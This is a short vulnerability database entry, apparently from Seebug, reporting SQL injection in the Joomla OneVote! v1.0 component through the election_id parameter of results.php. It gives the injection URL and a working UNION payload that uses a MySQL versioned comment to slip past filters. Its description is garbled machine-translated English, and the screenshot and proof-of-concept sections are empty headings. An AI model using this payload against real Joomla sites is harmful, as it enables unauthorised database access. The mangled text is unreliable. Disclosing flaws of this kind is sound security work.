Joomla! Component OneVote! v1.0 - SQL Injection

ID SSV:92738
Type seebug
Reporter Z3r0yu
Modified 2017-03-06T00:00:00


Joomla! Component OneVote! v1. 0 - SQL Injection

results. in php election_id parameters into the SQL statement exist GET the type of injection

Injection point:

http://localhost/[PATH]/components/com_onevote/results. php? election_id=[SQL]

union injected payload:

+/*! 50000union*/+select+@@version-- -

Test screenshot:

Other types of injection:

PoC validation: